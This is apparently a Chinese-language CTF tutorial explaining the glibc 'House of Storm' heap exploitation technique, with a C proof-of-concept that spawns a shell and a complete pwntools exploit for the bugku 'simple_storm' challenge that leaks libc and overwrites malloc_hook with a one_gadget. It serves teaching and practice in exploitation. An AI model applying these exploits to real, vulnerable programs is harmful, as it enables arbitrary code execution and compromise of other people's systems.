堆Pwn:House Of Storm利用手法

語言: CN / TW / HK

0x00:介紹

利用手法的背景:

house of storm是一種結合了unsorted bin attack和Largebin attack的攻擊技術,其基本原理和Largebin attack類似。但不同的是,Largebin attack只可以在任意地址寫入堆地址,而house of storm 則可以導致任意地址分配chunk,也就是說可以造成任意地址寫的後果,危害性大。不過,house of storm 雖然危害大,但其利用條件也是十分苛刻的。

該利用手法適用於glibc 2.28及以下的版本,因為unsorted bin attack在glibc 2.29中已失效。

利用條件:

1. 需要unsorted bin中的bk指標可控;

2. 需要largebin中的bk指標和bk_nextsize指標可控;

3. 需要在largebin和unsorted bin中分別佈置一個chunk,同時需要這兩個chunk在歸為之後處於同一個largebin的index中,且unsorted中的chunk要比largebin中大;

前置瞭解:

需要了解unsorted bin attack和Largebin attack攻擊手法。

下面會先大概介紹一下這兩種攻擊手法,並說明如何疊加變成house of storm。

0x01:前置的利用手法

Unsorted Bin Attack:

該攻擊手法可以達到任意地址寫一個libc地址(即 unsorted_chunks(av) )的效果。unsorted bin attack發生在malloc時,對unsorted bin 中的chunk脫鏈時刻。圖中的文字註明已經很清楚了,只要將unsorted bin的末尾chunk的修改為target - 0x10處,則在chunk脫鏈後,前後chunk進行fd/bk互連的過程中,會將target處賦值為一個libc地址。

但大家往往只關注到了target處被賦值了,其實unsorted_chunks(av) → bk同時也被賦值為了target - 0x10。

注意,在libc2.29中,這部分加入了雙鏈表檢查。這表明從libc2.29開始,unsorted bin attack手法就無法使用了。

Largebin Attack:

該利用手法的本質和unsorted bin attack一樣,都是基於雙鏈表互連過程中發生的。不過由於在large bin中,有靠fd/bk相連的雙鏈表和靠fd_nextsize/bk_nextsize相連的雙鏈表,所以可以對任意兩處的地址進行賦值,賦值為堆地址(victim,從unsorted bin中脫鏈出來的chunk)。

2.23 ~ 2.29版本中largebin attack的利用點,在2.30及以後的版本中,這裡加入了雙鏈表檢測,所以在libc2.30及以後,該處的largebin attack無法使用了。

Buffer疊加:

這裡說一下unsorted bin attack和largebin attack如何疊加,變成house of storm,達到任意地址分配chunk的效果。

在unsorted bin中的chunk脫鏈,然後連結到large bin的過程中,可以同時進行這兩種攻擊。為之,所以我們需要在large bin中佈置一個chunk,並且在unsorted bin中佈置一個size稍大於largebin的chunk,使其能夠連結在large bin中chunk的後面。

house of storm中,unsorted bin attack主要用到的是unsorted_chunks(av) → bk同時也被賦值為了fake(只是一個記號)。在下次申請chunk,使其進入unsorted bin的分支時,victim = unsorted_chunks(av) → bk(即fake),緊接著會有一個分支檢查其size是否滿足申請。只要滿足了,則會直接分配fake處為chunk返回。現在,我們的關鍵點就是如何使用largebin attack使得其size發生穩定的改變。

我們已經知道largebin attack是向任意地址賦值堆地址。在64字長的系統中,地址定址為8位元組,但堆地址只佔5個位元組,而特別的是僅已0x55或0x56開頭。那麼只要我們通過largebin attack向fake + 0x3處,賦值一個堆地址,則以fake為chunk的size處為0x55或者0x56。這樣,就成功的修改了size。

注意小端序的問題:

0x02:Demo示例

// gcc -ggdb -fpie -pie house_of_storm.c -o house_of_storm
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
struct {
    char chunk_head[0x10];
    char content[0x10];
}fake;

int main(void)
{
    unsigned long *large_bin,*unsorted_bin;
    unsigned long *fake_chunk;
    char *ptr;

    unsorted_bin=malloc(0x418);
    malloc(0X18);
    large_bin=malloc(0x408);
    malloc(0x18);

    free(large_bin);
    free(unsorted_bin);
    unsorted_bin=malloc(0x418);
    free(unsorted_bin);

    fake_chunk=((unsigned long)fake.content)-0x10;
    unsorted_bin[0]=0;
    unsorted_bin[1]=(unsigned long)fake_chunk;

    large_bin[0]=0;
    large_bin[1]=(unsigned long)fake_chunk+8;
    large_bin[2]=0;
    large_bin[3]=(unsigned long)fake_chunk-0x18-5;

    ptr=malloc(0x48);
    strncpy(ptr, "/bin/sh", 0x48 - 1);
    system(fake.content);
}

該程式碼展示的最終目標是分配chunk到fake_chunk。

程式碼16~19行,分配了兩個large bin範圍的chunk,並隔開。稍大的chunk後面會被調(tiao)到unsorted bin中,稍小的chunk會被free到large bin中。

程式碼21~24行,先將兩個chunk free到unsorted bin中(頭插法,先進先出)。然後malloc稍大的那個chunk使稍小的chunk進入large bin中,最後再次free掉稍大的chunk,使其進入unsorted bin。這樣就滿足的第三個條件。

後面就是對bk和bk_nextsize指標進行操控:

//程式碼26 ~ 33
 
    fake_chunk=((unsigned long)fake.content)-0x10;
//unsorted_bin->bk = fake_chunk
//則fake_chunk->fd = unsorted_chunks(av),不過似乎沒有發揮使用
//重點是:unsorted_chunks(av)->bk = fake_chunk
    unsorted_bin[0]=0;
    unsorted_bin[1]=(unsigned long)fake_chunk;

    large_bin[0]=0;
    large_bin[1]=(unsigned long)fake_chunk+8;
    large_bin[2]=0;
//(fake_chunk-0x18-5)->fd_nextsize = victim(a heap_addr)
//即fake_chunk-0x18-5+0x20 = fake_chunk+3 = victim
    large_bin[3]=(unsigned long)fake_chunk-0x18-5;

/*其實,largebin attack部分這樣也可以:
*    large_bin[0]=0;
*   large_bin[1]=(unsigned long)fake_chunk-0x8-5;
*   large_bin[2]=0;
*   large_bin[3]=(unsigned long)fake_chunk-0x8;
*因為有兩處可以修改任意地址
*/

malloc(0x48):申請0x50大小的chunk,chunk中size為0x55/0x56的大小也會被歸為0x50這一級別。malloc(0x48)這一過程中,把unsorted_bin脫鏈,並連結到了large bin中。

這裡需要size為0x56才能分配chunk成功,0x55是會發生報錯的。其原因是因為從_int_malloc返回到_libc_malloc後,還會有個斷言對chunk進行檢查:

/*
    #define arena_for_chunk(ptr) \
        (chunk_non_main_arena (ptr) ? heap_for_ptr (ptr)->ar_ptr : &main_arena)
    
    過以下檢測需要滿足的要求,只需滿足一條即可
    1. victim 為 0
    2. IS_MMAPPED 為 1
    3. NON_MAIN_ARENA 為 0
*/
assert(!victim || chunk_is_mmapped(mem2chunk(victim)) 
       || ar_ptr == arena_for_chunk(mem2chunk(victim)));

0x56:0101 0110,滿足第二個。

0x55:0101 0101,不滿足,會報錯。

因為系統一般會開ASLR,所以0x56、0x55發生的概率差不多,crash的話,多試幾次就好了。

0x03:題目實踐

bugku的simple_storm:

連結:https://pan.baidu.com/s/131cOS7m9gG34BKqDRWxMig 提取碼:lele

靜態分析程式,delete函式裡面存在UAF漏洞,那就可以隨便玩了。

這裡使用house of storm手法,應該還有其他方法。

具體思路就不說了,和上面的示例基本一模一樣,這裡getshell是通過覆蓋malloc_hook為one_gadget。需要注意的是選擇fake_chunk位置時,size位不能有資料,要為空。

from pwn import *
context(os='linux', arch='amd64', log_level='debug')

io = process("./simple_storm")
#io = remote("114.67.175.224", 12327)
libc = ELF("./libc-2.23.so")

def add(size):
    io.sendlineafter("Your choice?", "1")
    io.sendlineafter("Size?", str(size))

def delete(idx):
    io.sendlineafter("Your choice?", "2")
    io.sendlineafter("Index?", str(idx))

def edit(idx, content):
    io.sendlineafter("Your choice?", "3")
    io.sendlineafter("Index?", str(idx))
    io.sendlineafter("Content?", content)

def show(idx):
    io.sendlineafter("Your choice?", "4")
    io.sendlineafter("Index?", str(idx))

def debug():
    gdb.attach(io)
    pause()

add(0x400) #0
add(0x18)  #1
add(0x410) #2
add(0x18)  #3
delete(0)
show(0)
main_arena = u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 88
libc_base = main_arena - 0x3c4b20
print("@@@ main_arena = " + str(hex(main_arena)))
print("@@@ libc_base = " + str(hex(libc_base)))

delete(2)
add(0x410) #4
delete(4)

ogg = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
malloc_hook = main_arena - 0x10
fakechunk = malloc_hook - 0x50
edit(4, p64(0) + p64(fakechunk))
edit(0, p64(0) + p64(fakechunk + 0x8) + p64(0) + p64(fakechunk-0x18-5))
add(0x48) #5
edit(5, p64(ogg[1] + libc_base)*9)
add(0x20)
io.interactive()

本文參考:

https://www.anquanke.com/post/id/203096

https://www.cnblogs.com/Rookle/p/13140339.html

tolele

2022-09-25